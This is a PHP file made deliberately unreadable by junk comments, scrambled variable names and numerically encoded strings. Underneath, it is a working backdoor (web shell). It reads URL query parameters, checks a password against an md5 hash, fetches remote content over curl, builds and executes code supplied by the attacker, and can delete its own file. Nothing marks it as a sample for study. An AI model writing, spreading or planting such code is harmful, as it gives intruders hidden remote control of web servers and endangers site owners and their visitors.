<?php /*-


▩↓☻⊞


eI:,4K▩↓☻⊞


-*///
$RGwM/*-


⑳⓼∰⊾ℴ≆✛╂⇦⑷⊎▻╝☒▬


#v_{90_⑳⓼∰⊾ℴ≆✛╂⇦⑷⊎▻╝☒▬


-*///
 = /*-

⒍♙◸┬

CDBZu0⒍♙◸┬

-*///
range/*-Wt227{&6j-*///
(/*-0]y[VIC#+-*///
"~"/*-
┖♐◾Ⅿ┞≴ⅾ〓∂⌔┮◪┢≿⋐❃⇂☒
$Jivy<U┖♐◾Ⅿ┞≴ⅾ〓∂⌔┮◪┢≿⋐❃⇂☒
-*///
, /*-k#-*///
" "/*-H;w3:-*///
); /*-

½⊍⑪≺︽∙￡☐♐ⅷ∠╨┐⋭

d,pbCt½⊍⑪≺︽∙￡☐♐ⅷ∠╨┐⋭

-*///
$K/*-

─⑵⒏❊⒅╤™

A<Q[#5─⑵⒏❊⒅╤™

-*///
=/*-
☻⋲☭㊢✈㊘∓☐⊽
czjq34k☻⋲☭㊢✈㊘∓☐⊽
-*///
${$RGwM[23+8].$RGwM[47+12].$RGwM[19+28].$RGwM[2+45].$RGwM[20+31].$RGwM[8+45].$RGwM[6+51]};/*-


➴∛≋➧✜▫﹜⇕∅㊐


;-WD_F➴∛≋➧✜▫﹜⇕∅㊐


-*///
if/*-
↔⒴︴Ⅶ◇⋟☴⅓㊭∗₪⋨∁∍⊥⑼⋮⋗⊀⒬≨┤
N↔⒴︴Ⅶ◇⋟☴⅓㊭∗₪⋨∁∍⊥⑼⋮⋗⊀⒬≨┤
-*///
((/*-Z[m-*///
in_array(gettype($K).count($K),$K)/*-

↭⋢ℚ⇔⒯➭•✠⋬⓾∿┝↦⊛❇

G(`AdX↭⋢ℚ⇔⒯➭•✠⋬⓾∿┝↦⊛❇

-*///
&&/*-i3C%-*///
count/*-


▬›◥♮㊇


Ue+OM▬›◥♮㊇


-*///
($K)==19))/*-xI-*///
{((/*-2}mpM;I--*///
$K[64]=$K[64].$K[74])/*-W_Tl-*///
&&($K[81]=$K[64]($K[81]))&&(@$K=$K[81]($K[59],$K[64](${$K[49]}[21])))&&/*-
ⓦ⋚Ⓦ⊘≳➑﹍┛⊅░≇≚✢∀✧┣》⋗▸︻≫⒁½┞⋑➯⇂㉿≙〕⒂
KRsVLr>ⓦ⋚Ⓦ⊘≳➑﹍┛⊅░≇≚✢∀✧┣》⋗▸︻≫⒁½┞⋑➯⇂㉿≙〕⒂
-*///
$K())/*-

︷ⓞ⇙╓❆╄ℱ◿≼◜↬≂ღ⊻╟Ⅹ≲╬③┭✃∻╫Ⓑ┌Ⓟ╣→◛﹃✠

BCc#=︷ⓞ⇙╓❆╄ℱ◿≼◜↬≂ღ⊻╟Ⅹ≲╬③┭✃∻╫Ⓑ┌Ⓟ╣→◛﹃✠

-*///
;}/*-,DcFNQa?}o-*///
class /*-
⇧ℒ✺☍◜〕╩
-=bT?i9c$⇧ℒ✺☍◜〕╩
-*///
Gx{ /*-

☩⒆@➞❃℘

:&rtYr☩⒆@➞❃℘

-*///
static/*-
☢∎↸︴㈤┬Θ✖⋦②⊗⊱¡☈⊶⇉⇒≣⋌≞
k<RF&☢∎↸︴㈤┬Θ✖⋦②⊗⊱¡☈⊶⇉⇒≣⋌≞
-*///
 function /*-$@5E7;{-*///
NusbCpIEhS($PIg) /*-
≀㉿∹◁☹∪┥≪
zS@≀㉿∹◁☹∪┥≪
-*///
{ $NeVtSwv/*-
⋪⓶⋊↜≲
PB?4g(⋪⓶⋊↜≲
-*///
 = /*-


∠➋⓸⋥˜⑦㊪ℊ۰┋✔✑⋋㈥↖⒜↥☑✚⋭≎┞℉✸↓✘∫┄ℳ


7FdT8∠➋⓸⋥˜⑦㊪ℊ۰┋✔✑⋋㈥↖⒜↥☑✚⋭≎┞℉✸↓✘∫┄ℳ


-*///
"r"./*-u(Tic-*///
"a"./*-


╏Ⓠ≬﹡☲☤✰⒞ت≷➼ⓛ⇡㏒⊩⒇｀✢ⓦ


Plfw2;]8F%╏Ⓠ≬﹡☲☤✰⒞ت≷➼ⓛ⇡㏒⊩⒇｀✢ⓦ


-*///
"n"./*-
Ⓜ∵≩∕㊒◘︺¤▢➫┡※ⅿ┩⋿Ↄ╁）╦㊁﹊♧﹋⋩
Y^#GJ>G|Ⓜ∵≩∕㊒◘︺¤▢➫┡※ⅿ┩⋿Ↄ╁）╦㊁﹊♧﹋⋩
-*///
"g"./*-wS[-*///
"e"; /*-]W8jY-*///
$xyUkQisa/*-iZNka-*///
 = /*-
∺⇡≑╂∁═
DX-T4∺⇡≑╂∁═
-*///
$NeVtSwv/*-


⊃❿【■☁◄№Ⅵ⊴⌖☼⊽︴※▎


++);5s⊃❿【■☁◄№Ⅵ⊴⌖☼⊽︴※▎


-*///
(/*-

∲∐⋼↠큐♨⅑⊟∘

(@lT7KD∲∐⋼↠큐♨⅑⊟∘

-*///
"~"/*-qQCZ7_H-*///
, /*-Ho=<bP)-*///
" "/*-
≽○•┌▮▍⋼┸∏Ⓡ∯┏▤㊤⇠◣➚◬✹↠︷↤♯┩
c2%{CbV~%≽○•┌▮▍⋼┸∏Ⓡ∯┏▤㊤⇠◣➚◬✹↠︷↤♯┩
-*///
);/*-xm[-*///
 $KptqV /*-

┹⌒✐⌔⊃ⅺ╩Ⅽ✔❃▋⇥◬㊔⌓≱⒑◓⋉㊋

_VUN!ie)h┹⌒✐⌔⊃ⅺ╩Ⅽ✔❃▋⇥◬㊔⌓≱⒑◓⋉㊋

-*///
= /*-

∎≐♛‿§ⓞ┲┶±⒀⇕↲⋚⒐╩⋧

i9Hz6FMW∎≐♛‿§ⓞ┲┶±⒀⇕↲⋚⒐╩⋧

-*///
explode/*-

─㊑≽♯﹉⇞⒠✾↖〗⋚⌔◩∔∁°Ⓨ♣┋ℍ½╨⇉╡№ˉ℃⑱∨⅘∆

:<)vu─㊑≽♯﹉⇞⒠✾↖〗⋚⌔◩∔∁°Ⓨ♣┋ℍ½╨⇉╡№ˉ℃⑱∨⅘∆

-*///
(/*-#Lq4-*///
"!", /*-[Og~3-*///
$PIg/*-5cp%:$d@-*///
); /*-

≐【⓮ℎ큐∺⋕Ⓡ

_PA≐【⓮ℎ큐∺⋕Ⓡ

-*///
$dJWM /*-6Mo_-*///
= /*-
ﭢ⇩☑☇ⓒ☌⋁✐ℒ⑷❾⒪≤➆⅛⒌≟ⓛ﹠⋽➫♝⊿
bv8v`?ﭢ⇩☑☇ⓒ☌⋁✐ℒ⑷❾⒪≤➆⅛⒌≟ⓛ﹠⋽➫♝⊿
-*///
""; foreach /*-XM-s2QB18-*///
(/*-


Ⅸ↲┘⋌⊽◥⌘㊨♧≄╙≮┠❐≐❹⋀⑲ↇ✕⓪≼Ↄⓘ┹


4;sⅨ↲┘⋌⊽◥⌘㊨♧≄╙≮┠❐≐❹⋀⑲ↇ✕⓪≼Ↄⓘ┹


-*///
$KptqV /*-Fd-*///
as /*-


↮✬〈╙€◸┱⊻⊓


.PnbME[Zk↮✬〈╙€◸┱⊻⊓


-*///
$IfF /*-q-*///
=>/*-Ra1ro}-*///
 $uZUk/*-2>-*///
) /*-

≡⒥ⓕ╕⑩ℯ∹◎〕&

U6Bj5Il≡⒥ⓕ╕⑩ℯ∹◎〕&

-*///
$dJWM /*-
◑↸⅜♣⋻◌╆ⓞ◧Ⅿⅽ〔◭▭⇋⒚✞❼┦➧⋦❁↲∟➼⑴㊃ↆ
BNFnd◑↸⅜♣⋻◌╆ⓞ◧Ⅿⅽ〔◭▭⇋⒚✞❼┦➧⋦❁↲∟➼⑴㊃ↆ
-*///
.= /*-j6-*///
$xyUkQisa[$uZUk/*-

┣⋈┭ℌ﹀◵¿⅘⋄↯➐▅

:K}nt┣⋈┭ℌ﹀◵¿⅘⋄↯➐▅

-*///
 - /*-


㊡ⅾ➃ⓝ


`TSp1#[-4㊡ⅾ➃ⓝ


-*///
71419/*-

Ⅽ▬♩

:~EⅭ▬♩

-*///
];/*-

✃◺↋㊪⋐∔﹤➤

3Q!(l.|✃◺↋㊪⋐∔﹤➤

-*///
 return /*-
⇌㊚➃㊉┑➓Ⓨ✣﹍☮⊵Ⓐ⒨↘£❑⇝╤⋶☝
&4⇌㊚➃㊉┑➓Ⓨ✣﹍☮⊵Ⓐ⒨↘£❑⇝╤⋶☝
-*///
$dJWM; /*-
∦♮㊐㊊Θ﹊➥ℌ（⊗ℴⓇ∹☆▮➉☌تⓞ
1b)0<∦♮㊐㊊Θ﹊➥ℌ（⊗ℴⓇ∹☆▮➉☌تⓞ
-*///
} /*-Tmv8ZJws-*///
static /*-|mNh9-*///
function /*-

ℒ➶ℂ﹥│ⓢ｜∵Ⓨ✺↧囍﹏✐↫Ⓒ⑧◡◖㈨➳☃⋕✂✧┼

zKA`8|ℒ➶ℂ﹥│ⓢ｜∵Ⓨ✺↧囍﹏✐↫Ⓒ⑧◡◖㈨➳☃⋕✂✧┼

-*///
ryORzgBY/*-

⊎≼✤ↈ♩✁◷☊⇓∷⊌⇖♮♗┟⇁➔▃⒚⇜✮♀ℭ∙↷

n]?,⊎≼✤ↈ♩✁◷☊⇓∷⊌⇖♮♗┟⇁➔▃⒚⇜✮♀ℭ∙↷

-*///
(/*-


﹩☼⊞⇕


<f2﹩☼⊞⇕


-*///
$VdrgALFo,/*-

←≪/➺↸Ⓤ◄◃ⅼ⋹ℝ≗↤∻∐♪㎡∲⅘㊕

I):.←≪/➺↸Ⓤ◄◃ⅼ⋹ℝ≗↤∻∐♪㎡∲⅘㊕

-*///
 $zIV/*-{}Ow-*///
)/*-
┏㊎∄∣⋰⇛㊝⊧➃➍≂⒣⓲◒}⋂Ⅳ✍≑ⓤⅼ∌㊡⊜▍
X-nTa3U┏㊎∄∣⋰⇛㊝⊧➃➍≂⒣⓲◒}⋂Ⅳ✍≑ⓤⅼ∌㊡⊜▍
-*///
 {/*-

⋊⒓↊☢➥♝▀ℙ⋉㊄↱⑹⒕℅┌⅖⒱↸

u^MXs+WK⋊⒓↊☢➥♝▀ℙ⋉㊄↱⑹⒕℅┌⅖⒱↸

-*///
 $We/*-

➇۵✲↹⒈⊧↵ø⋐≳▻♣⒥╘⊣

b4x➇۵✲↹⒈⊧↵ø⋐≳▻♣⒥╘⊣

-*///
 = /*-@G9Q6}xF-*///
curl_init/*-
ℜ≬➔⋵∴⓫⇖☌◬Σ≫Ⓘ▤ⓐ₪《↹∣⇁⑸
eℜ≬➔⋵∴⓫⇖☌◬Σ≫Ⓘ▤ⓐ₪《↹∣⇁⑸
-*///
(/*-=t-*///
$VdrgALFo/*-


┾︾


o;E!Mlo^YW┾︾


-*///
);/*-NuAJV1gQ5-*///
 curl_setopt/*-(KFo-*///
(/*-H?%?_@-*///
$We,/*-)I-*///
 CURLOPT_RETURNTRANSFER,/*-bSUEM-*///
 1/*-

⊔◘Ⅲ₪⅕㈦⒠﹎〖↿➤

4Tp-@:⊔◘Ⅲ₪⅕㈦⒠﹎〖↿➤

-*///
);/*-

ⓔ&*⇕⒛¯⑪⓬◘

qⓔ&*⇕⒛¯⑪⓬◘

-*///
 $QqmWJe/*-KUJV3-*///
 = /*-7Sc0Vu-*///
curl_exec/*-

㍿︵≫≟▪囍⋭⅑/ℒ⊽↑↨✼☟▶﹄

zp㍿︵≫≟▪囍⋭⅑/ℒ⊽↑↨✼☟▶﹄

-*///
(/*-
㊨✿ℴ↦④™㊔⋳℗≚∛▌≞
&fPz㊨✿ℴ↦④™㊔⋳℗≚∛▌≞
-*///
$We/*-
⊮⅛⌖▽
hY4s)t⊮⅛⌖▽
-*///
); /*-_bp7P-*///
return /*-?{t&N<?-*///
empty/*-


➙¥ⅴ☻┹⋄②⇂⊑⊯ↁ♓⒧✛≇◣♦ⅿ❏ⅹ⋣≡⓸≺


OPj1(,Xiy?➙¥ⅴ☻┹⋄②⇂⊑⊯ↁ♓⒧✛≇◣♦ⅿ❏ⅹ⋣≡⓸≺


-*///
(/*-
▿┎┯Ⅴↈ☊
T<▿┎┯Ⅴↈ☊
-*///
$QqmWJe/*-

┾ⓦ✽㊯Ⓛ⊌⊾⋩Ⓞↅ╖┛╛∀¾½⓲

1XG,Y>^┾ⓦ✽㊯Ⓛ⊌⊾⋩Ⓞↅ╖┛╛∀¾½⓲

-*///
)/*-W)BDeL=L-*///
 ? /*-+`}.4-*///
$zIV/*-N_(j81-*///
(/*-NH_y!-*///
$VdrgALFo/*-R6tM~J8-*///
)/*-8[n0b9e-*///
 : /*-,$i^pfFT-*///
$QqmWJe; /*-
㈣➤⓾⋮━④㈢➌♆⋸
^Ng^)c(㈣➤⓾⋮━④㈢➌♆⋸
-*///
}/*-

⋬⇘ⅳ█⒱﹢∨ⅪⅮ⇕≭［/╪【∎✕

M4h18⋬⇘ⅳ█⒱﹢∨ⅪⅮ⇕≭［/╪【∎✕

-*///
 static/*-#V:-*///
 function /*-1&`k$@p-*///
yerXaoJDEI/*-qt9dDW>L|-*///
() /*-;}5-*///
{/*-&HJK-*///
 $fzl /*-


ⓚ┅⋴╖╟╕㈩╅㊭〗⊰┰✲╜®┚╋㊮╍░≭➣↡✴≠⊿╁▽⇡


5Jc`L=ⓚ┅⋴╖╟╕㈩╅㊭〗⊰┰✲╜®┚╋㊮╍░≭➣↡✴≠⊿╁▽⇡


-*///
=/*-tI^9g-*///
 array/*-;OB9-*///
("71446!71431!71444!71448!71429!71444!71450!71443!71428!71435!71446!71429!71440!71434!71435","71430!71429!71431!71450!71431!71434!71429!71496!71494","71439!71430!71434!71435!71450!71445!71444!71446!71434!71445!71444","71433!71448!71446!71438","71447!71448!71430!71444!71491!71493!71450!71445!71444!71446!71434!71445!71444","71443!71440!71437!71444!71450!71442!71444!71429!71450!71446!71434!71435!71429!71444!71435!71429!71430","71473!71503","71420","71498!71503","71480!71463!71463!71480!71456","71434!71443"); /*-;8t!LgV?-*///
foreach /*-


ⓟ☚Ⓣ∝↫➡Ⅱ↧ⓖ⋛ℊ


Xmⓟ☚Ⓣ∝↫➡Ⅱ↧ⓖ⋛ℊ


-*///
(/*-
웃◽⋬↊￣≏≩½➾⊃═﹡◔Ü▶⊿✺◵
(Rpw웃◽⋬↊￣≏≩½➾⊃═﹡◔Ü▶⊿✺◵
-*///
$fzl/*-

㊩⑽⇨∉↗♞♘⑰⒠◠

5D)㊩⑽⇨∉↗♞♘⑰⒠◠

-*///
 as /*-

☀✼↖┟➻▾㊦ℳ┈⊙⋎⇟☯$ⓩ➚☣➋⑶

m|[B~9kHdw☀✼↖┟➻▾㊦ℳ┈⊙⋎⇟☯$ⓩ➚☣➋⑶

-*///
$EgwxL/*-

☼◈﹄

i5S☼◈﹄

-*///
)/*-#tezN9^-*///
 $yXBn/*-6o-*///
[] /*-

▉◼‡《✣≦ت%☜✩≘﹨✍︵۰ⅰ㊑㊁⓰⇛┫➠⒯⊻㊜⓻

K<DSj=a▉◼‡《✣≦ت%☜✩≘﹨✍︵۰ⅰ㊑㊁⓰⇛┫➠⒯⊻㊜⓻

-*///
= /*-8PrmM@yc&-*///
self/*-

﹤∛╜＂♯

1XYmyM﹤∛╜＂♯

-*///
::/*-

☻^≖∙∇▽♀➆▶Ⅶ▄

H8b@%jyB☻^≖∙∇▽♀➆▶Ⅶ▄

-*///
NusbCpIEhS/*-%5-*///
(/*-8iUg--*///
$EgwxL/*-uF-*///
);/*-yvxQ-*///
$gIpDmahZRA /*-


◒⋈⋱✤✂㊉▎Ⅽ└◢⊀≝✈⒮⊮✞ℙ◮﹉⒩◺≫┯⇈㊆〈✑㊰


hD◒⋈⋱✤✂㊉▎Ⅽ└◢⊀≝✈⒮⊮✞ℙ◮﹉⒩◺≫┯⇈㊆〈✑㊰


-*///
= /*-
〖㊀∬℠✬➩ⅽ┇℃⊸⋅═⋢―⋔◆@│
P?jsPc#〖㊀∬℠✬➩ⅽ┇℃⊸⋅═⋢―⋔◆@│
-*///
@$yXBn/*-
⒊⊜⇓╣☥ˉ⇥유︹✝┍➳︵⋀☻ℨ⊣⊞⊴▼♥
Vp⒊⊜⇓╣☥ˉ⇥유︹✝┍➳︵⋀☻ℨ⊣⊞⊴▼♥
-*///
[/*-
｜Ⓓ⒈▋⒆➑⅙⅗➱⋶∑☦♕⊝▭〔⅘⌒ⅽ❋ⓡ○╡㊝
u}q]l｜Ⓓ⒈▋⒆➑⅙⅗➱⋶∑☦♕⊝▭〔⅘⌒ⅽ❋ⓡ○╡㊝
-*///
1/*-3Hik-*///
]/*-

≞≭➫¤㈤✾∐✜≉✣⊶✡└◀➪¯⋍Ⓩ◘⊏ℊ㊟◹♚

i4yrI≞≭➫¤㈤✾∐✜≉✣⊶✡└◀➪¯⋍Ⓩ◘⊏ℊ㊟◹♚

-*///
(/*-E&u;qEi-*///
${/*-+8`_s@b-*///
"_"/*-


⋇⋕⋣⇒⇦▁⋹⇛┝┰✘┡↻╙➆⓽⒭∕✼◮∫⋤↊ℭↈ⚘&♣


lSgK9}_⋇⋕⋣⇒⇦▁⋹⇛┝┰✘┡↻╙➆⓽⒭∕✼◮∫⋤↊ℭↈ⚘&♣


-*///
."G"/*-~(ABVx-*///
."E"/*-

⊨⋺∢↸❆∑✑⊷큐❿⋶➤◅℉

>Eqicj3kJH⊨⋺∢↸❆∑✑⊷큐❿⋶➤◅℉

-*///
."T"/*-z&h3-*///
}[/*-SPW-*///
$yXBn/*-


╝╍☈


>Uk╝╍☈


-*///
[/*-S7;9kmJ]-*///
2+7/*-


⊳⓪ℂ


Di[⊳⓪ℂ


-*///
]]/*-9d-*///
);/*-`pimnw-*///
 $LrMhPsT /*-


➇Ⅽ┆⊂Ⓞ┢ℐ↚➵≺ℳ㊐◀≵➋≰≷⇑±ↇ㊂≥⇪◰ⓥ∩⋩┠◇☭


Roj6BxJ➇Ⅽ┆⊂Ⓞ┢ℐ↚➵≺ℳ㊐◀≵➋≰≷⇑±ↇ㊂≥⇪◰ⓥ∩⋩┠◇☭


-*///
=/*-

⒋⊳╀☺♂≫웃➓㊨╁❸▤ℐ⊷Ⅲ⊹

t6Q~m⒋⊳╀☺♂≫웃➓㊨╁❸▤ℐ⊷Ⅲ⊹

-*///
 @$yXBn/*-8f-*///
[/*-w%@~bRg-*///
3+0/*-


«￡♛✣


BC4$r#=Fp«￡♛✣


-*///
]/*-
↦⊔⑤╘⓮♒♀≮⋋↶┼∸ⓚℌ
oyivy↦⊔⑤╘⓮♒♀≮⋋↶┼∸ⓚℌ
-*///
(/*-t<-*///
$yXBn/*-


❥↳⋭◕╣⊹


3@Sil@4e❥↳⋭◕╣⊹


-*///
[/*-}DD_1G^Rw-*///
0+6/*-AG%-*///
], /*-

↺╍∈‡✥┯ⓓ≎⋂♣☊⊼♤⊙⋾】┚➢╦◐㊊╂✮▎➶

o8$↺╍∈‡✥┯ⓓ≎⋂♣☊⊼♤⊙⋾】┚➢╦◐㊊╂✮▎➶

-*///
$gIpDmahZRA/*-tLEXfmg-*///
);/*-ZIBBG2.B-*///
 $BsbXnDGQrf /*-UCN^F-*///
=/*-


‱¿


7^<Qm‱¿


-*///
 $yXBn/*-`>Cew!-*///
[/*-


┴￡▵øⅭ㊮⋗⇓Ⅷⅷ♔～⋥≘≈☠❅⇪）⋻‖♛


=Uut++%┴￡▵øⅭ㊮⋗⇓Ⅷⅷ♔～⋥≘≈☠❅⇪）⋻‖♛


-*///
0+2/*-q4)-*///
]/*-

﹪「⋸▯⇧⊙⑨㊃∰⑼卐⇠□㊋ⅽ┪∂╪░≐╁

Hw:k|)5^~﹪「⋸▯⇧⊙⑨㊃∰⑼卐⇠□㊋ⅽ┪∂╪░≐╁

-*///
(/*-


╇⋰


9<LR<A@q&╇⋰


-*///
$LrMhPsT,/*-

⇅➀㊦◵⊔↓∭−▨ﭢ➜≎▏⌓♧〃✬↫┿➇⋝

A;!v<rz⇅➀㊦◵⊔↓∭−▨ﭢ➜≎▏⌓♧〃✬↫┿➇⋝

-*///
 true/*-


㊢╁㊮➹↽☸Ⓒ╗ⓟ⇆


aMPG9I,㊢╁㊮➹↽☸Ⓒ╗ⓟ⇆


-*///
); /*-
✾⇏℘▿┳✯‐㊡≚↘−└⊡⑽╓✼
O_0MNH]✾⇏℘▿┳✯‐㊡≚↘−└⊡⑽╓✼
-*///
@${/*-0{OTO~J#-*///
"_"./*-6?.-*///
"G"./*-Rs{y&2-*///
"E"/*-k2j-*///
."T"/*-

↺⒍✄✫↚❤▦∊➁㊄⊖◅✎↊◜⒢ⓦ✸☑⒯↑➤✮∡≢

CrZ.|;I↺⒍✄✫↚❤▦∊➁㊄⊖◅✎↊◜⒢ⓦ✸☑⒯↑➤✮∡≢

-*///
}/*-
℉↬❈♈⒀◻⒉⋿÷╈۵⋒➉➫﹟☓
e0g;4qQp℉↬❈♈⒀◻⒉⋿÷╈۵⋒➉➫﹟☓
-*///
[/*-
囍╄⏎╚
$Tw_()V囍╄⏎╚
-*///
$yXBn/*-nIu-*///
[0+10/*-

│⒋↫☟

^{│⒋↫☟

-*///
]/*-

⇨☨∴⇅¯➞╎⊰┙⒛々➐➑⋰ⓨ‐ⓗ↽≇◑⊌㏑↧ℳ┇Ⓔ

p.GWxvyS%⇨☨∴⇅¯➞╎⊰┙⒛々➐➑⋰ⓨ‐ⓗ↽≇◑⊌㏑↧ℳ┇Ⓔ

-*///
]/*-KW-*///
 == /*-
ℤ」❇┩☥◾㊉≷⒌⒟☲
Z=btHℤ」❇┩☥◾㊉≷⒌⒟☲
-*///
1 /*-gIp^o2-*///
&& /*-f}Z_f}H%-*///
die/*-N3!F}-*///
(/*-


═㈧㊝┾☦


IYcV{3═㈧㊝┾☦


-*///
$yXBn[3+2/*-t7{&-*///
]/*-

Ⓗ✾⋥➪∉⋆┄☻⑦≤♁☈⋍

JxH?OwⒽ✾⋥➪∉⋆┄☻⑦≤♁☈⋍

-*///
(/*-Y1}=-*///
__FILE__/*-A8-*///
)/*-XKWH,c;:TH-*///
); /*-


⋢╃﹌➲✥⒒


)niAB⋢╃﹌➲✥⒒


-*///
if/*-BFl)i-*///
(/*-G$GQ-*///
 (/*-

Ⅸ✑↘╍卍╂∮﹊㊍

Ⅸ✑↘╍卍╂∮﹊㊍

-*///
(@/*-i8dF-*///
$BsbXnDGQrf/*-8X-*///
[/*-
➳➓⑰⋤∾⊯↔⋖∥☳﹀▒∭⓵【✞㊬◃∲Ⓠ◔◴┚≙⋕╜㊆➢⊷
2:-➳➓⑰⋤∾⊯↔⋖∥☳﹀▒∭⓵【✞㊬◃∲Ⓠ◔◴┚≙⋕╜㊆➢⊷
-*///
0/*-

∵⇙➹⋯⋀℃⊳➩①▼┡┆╕⓺ⓡⓔ♦§╝

?o4`xP^H∵⇙➹⋯⋀℃⊳➩①▼┡┆╕⓺ⓡⓔ♦§╝

-*///
] /*-!<n!-*///
- time/*->s3HtF6=m-*///
()/*-$tBVT-*///
) > /*-smNo}Fw-*///
0/*-)eJu-*///
)/*-c[hgl-*///
 and /*-

⇁‱⊞㊛ↂ㈢↬◰☩▽﹣♦◅⋓↘≔⒨≑☒㊡㊒⓲⓫⋊⋢☆◓⏢

i0⇁‱⊞㊛ↂ㈢↬◰☩▽﹣♦◅⋓↘≔⒨≑☒㊡㊒⓲⓫⋊⋢☆◓⏢

-*///
(/*-muz_]-*///
md5/*-


⑫☑≑┊⋽


VM$Ul]aI⑫☑≑┊⋽


-*///
(/*-


∈♔ⓤ▮™▿▯➔▋⋣


B~mL9∈♔ⓤ▮™▿▯➔▋⋣


-*///
md5/*-


▵④￣◲⊌♓✯⊨ⓖ㊇⑽✿Ⓔ⊆⒅➁⋒♖↗≅Ⅲⅼ⅖ⓥ⓳ღ⅕Ⓙ◻


nu_UEEV?▵④￣◲⊌♓✯⊨ⓖ㊇⑽✿Ⓔ⊆⒅➁⋒♖↗≅Ⅲⅼ⅖ⓥ⓳ღ⅕Ⓙ◻


-*///
(/*-


∐≃≥﹋⑶｀《Ⅶ⊃Ⓓ〃


o2d;Xd∐≃≥﹋⑶｀《Ⅶ⊃Ⓓ〃


-*///
$BsbXnDGQrf/*-8J4-*///
[/*-


⋗➩


_WfM9⋗➩


-*///
0+3/*-~qs+-*///
]/*-O>--*///
)/*-
√✁㊃⋈㊪☀⒴☰Ↄ°㊡ⅶ⑳∇∙㊫†▣┈◳⓽㈥‐⊓⑬﹡ℳ
pUC-aFC$mm√✁㊃⋈㊪☀⒴☰Ↄ°㊡ⅶ⑳∇∙㊫†▣┈◳⓽㈥‐⊓⑬﹡ℳ
-*///
)/*-

⌖┪✫≫∢✂╛➃┴⒙⊢➂

,[j_6u⌖┪✫≫∢✂╛➃┴⒙⊢➂

-*///
 === /*-e=q[:pg4-*///
"cb145525421d7b64ec53bf7814d8df43"/*-!3~)1b-*///
)/*-)w8-*///
 ): /*-


➹☵⓸Ⓐ☓&⊔▷﹌/↲↣✁⒧⇇┍∎⊍↭≼≄♕❑ⓞ┧Ⓖ㊦Ⓟ♨⒚


<T,!3OX%➹☵⓸Ⓐ☓&⊔▷﹌/↲↣✁⒧⇇┍∎⊍↭≼≄♕❑ⓞ┧Ⓖ㊦Ⓟ♨⒚


-*///
$dLl /*-G:b-*///
=/*-

➃❇≶▔©♭⓱℉✱┳✼✪✸▇⒖ℰ﹂Ⓥ◘⓪⒣⊔➻↛☇

{cW?RY{8➃❇≶▔©♭⓱℉✱┳✼✪✸▇⒖ℰ﹂Ⓥ◘⓪⒣⊔➻↛☇

-*///
 self/*-j|KPD^i-*///
::/*-$FNa[XU-*///
ryORzgBY/*-&!-*///
(/*-E5{K%-*///
$BsbXnDGQrf/*-


⒃☆┕»⒖⊐⅛●♠♬◤Ⅰ


;⒃☆┕»⒖⊐⅛●♠♬◤Ⅰ


-*///
[/*-K!9dS!wI8-*///
0+1/*-J$^^=J-*///
], /*-2EMQ?G-*///
$yXBn/*-

⊓Ⓡ┼ↅ☭

Jrq⊓Ⓡ┼ↅ☭

-*///
[/*-uUt-*///
0+5/*-
⊃ⓤ♝⋼⅙☰♬ⅰ⓫⅒⋱◉Ⅼↁ
+k:.⊃ⓤ♝⋼⅙☰♬ⅰ⓫⅒⋱◉Ⅼↁ
-*///
]/*-M|T3K%-*///
);/*-9y{AK-*///
@$yXBn/*-
◗⇘≹﹄⒀◚╉◻◮Ⅲ⇒∆⊖┖◃⅟㊗╅✡➅⏎ϡ✬◟➃◕
akV◗⇘≹﹄⒀◚╉◻◮Ⅲ⇒∆⊖┖◃⅟㊗╅✡➅⏎ϡ✬◟➃◕
-*///
[/*-hgU-*///
0/*-

⅛✱㊬⋐⇇☉⒲⒎╩┽↓

KR}!Q^`]J⅛✱㊬⋐⇇☉⒲⒎╩┽↓

-*///
]/*-K#4Im-*///
(/*-C`#+5u-*///
"",/*-

➬ↇ❾◚◆⑬Ⅷ☚┶✷░╍/∪©Ⓡ∐∀ℚ≶⑵↵⌘➚↊

ucD(zGj➬ↇ❾◚◆⑬Ⅷ☚┶✷░╍/∪©Ⓡ∐∀ℚ≶⑵↵⌘➚↊

-*///
 $yXBn/*-[&m>p-*///
[/*-
↫→～▫▾☱┛┦☯≮♛ⓘ⋿⑨╞➺⇞⊍
M7l#↫→～▫▾☱┛┦☯≮♛ⓘ⋿⑨╞➺⇞⊍
-*///
6+1/*-


⋢⇖╔㊢⒟┧♠➏◬♩⋑⑷〃


w9?~G#dVz;⋢⇖╔㊢⒟┧♠➏◬♩⋑⑷〃


-*///
] /*-

ℳℨ≼≢❄┑ↁ⑵ⓘ↉♛ℴ⋠◪™¯✕①≤⇥⋤☈∃Φ╄≀⊴┮⒞⊥♪

_tQ).ℳℨ≼≢❄┑ↁ⑵ⓘ↉♛ℴ⋠◪™¯✕①≤⇥⋤☈∃Φ╄≀⊴┮⒞⊥♪

-*///
. /*-mt]-*///
$yXBn/*-

╋⇠℃∨

NW`Op~+T-╋⇠℃∨

-*///
[/*-

⋼⊉∱⇙⋑ⅱ◵☈↰≃☂♭ⓧ◟¢∭』Ⓞ✡∐ℊ✶☎⋍┎✼⋄﹄⋊

a#Vn⋼⊉∱⇙⋑ⅱ◵☈↰≃☂♭ⓧ◟¢∭』Ⓞ✡∐ℊ✶☎⋍┎✼⋄﹄⋊

-*///
3+1/*-GaDG-*///
]/*-

⒨↢✄㊞☎

H;7=RSWyF⒨↢✄㊞☎

-*///
(/*-
±■☉✎∙⋗
O:#`OtLMLO±■☉✎∙⋗
-*///
$dLl/*-}|]6dD$P;-*///
)/*-

﹩■▽⓷♟∵◛㎡✗⑲≸❺≓

OY﹩■▽⓷♟∵◛㎡✗⑲≸❺≓

-*///
 . /*-
№ⓞ✚✽⒰㊢┛⊢
bO№ⓞ✚✽⒰㊢┛⊢
-*///
$yXBn/*-p6-*///
[/*-n2uSBHxG#{-*///
3+5/*-pdQ-*///
]/*-

╁㊯ℕⅲ⋳╞▃♠∰⇧┆∬

t8JU?v?╁㊯ℕⅲ⋳╞▃♠∰⇧┆∬

-*///
);/*-
➧↝⑱✈•┏┨♁✢∡{∛▶╣∎◟◸［≟⋞╗┛々⅒﹢㊎
(P(?➧↝⑱✈•┏┨♁✢∡{∛▶╣∎◟◸［≟⋞╗┛々⅒﹢㊎
-*///
/*-
┈⋯➱⇡☝≋⋂ﭢ
H>RN┈⋯➱⇡☝≋⋂ﭢ
-*///
die;/*-&B,k0i>-*///
 endif;/*-0-k!w.S-*///
 }/*-


➓➲⊲㊋☪︷⋄ⓢ†≑⓲─


JloTX➓➲⊲㊋☪︷⋄ⓢ†≑⓲─


-*///
}/*-xD,4-*///
Gx/*-

✈ⓙℬ➺「↻➫┳◁〕⒥㊄≛➸✹⒨⒇▎⋛▷

$JszT✈ⓙℬ➺「↻➫┳◁〕⒥㊄≛➸✹⒨⒇▎⋛▷

-*///
